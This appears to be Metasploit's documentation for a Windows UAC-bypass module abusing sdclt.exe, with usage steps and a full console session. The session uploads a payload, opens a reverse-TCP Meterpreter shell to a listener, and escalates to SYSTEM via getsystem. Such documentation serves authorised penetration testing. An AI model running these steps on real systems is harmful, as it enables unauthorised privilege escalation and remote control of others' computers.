CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/local/bypassuac_sdclt.md
Views: 1904

Introduction

This module exploits an autoelevate feature in the windows backup system's sdclt.exe binary to run as a higher integrity process.

Usage

  1. Create a session on the target system under the context of a local administrative user.

  2. Begin interacting with the module: use exploit/windows/local/bypassuac_sdclt.

  3. Set the PAYLOAD and configure it correctly.

  4. If an existing handler is configured to receive the elevated session, then the module's handler should be disabled: set DisablePayloadHandler true.

  5. Make sure that the SESSION value is set to the existing session identifier.

  6. Invoke the module: run.

Scenarios

Windows 10.0.17134 x64

msf5 exploit(windows/local/bypassuac_sdclt) > show options

Module options (exploit/windows/local/bypassuac_sdclt):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   PAYLOAD_NAME                   no        The filename to use for the payload binary (%RAND% by default).
   SESSION       1                yes       The session to run this module on.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.135.168  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x64


msf5 exploit(windows/local/bypassuac_sdclt) > run

[*] Started reverse TCP handler on 192.168.135.168:4444 
[*] UAC is Enabled, checking level...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] win_dir = C:\Windows
[*] tmp_dir = C:\Users\msfuser\AppData\Local\Temp
[*] exploit_dir = C:\Windows\System32\
[*] exploit_file = C:\Windows\System32\sdclt.exe
[*] payload_pathname = C:\Users\msfuser\AppData\Local\Temp\YwaGlnJtV.exe
[*] Making Payload
[*] reg_command = C:\Windows\System32\cmd.exe /c start C:\Users\msfuser\AppData\Local\Temp\YwaGlnJtV.exe
[*] Uploading Payload to C:\Users\msfuser\AppData\Local\Temp\YwaGlnJtV.exe
[*] Payload Upload Complete
[*] Launching C:\Windows\System32\sdclt.exe
[!] This exploit requires manual cleanup of 'C:\Users\msfuser\AppData\Local\Temp\YwaGlnJtV.exe!
[*] Please wait for session and cleanup....
[*] Sending stage (206403 bytes) to 192.168.132.125
[*] Meterpreter session 2 opened (192.168.135.168:4444 -> 192.168.132.125:49679) at 2019-10-25 14:55:08 -0500
[*] Removing Registry Changes
[*] Registry Changes Removed

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-D1E425Q\msfuser
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >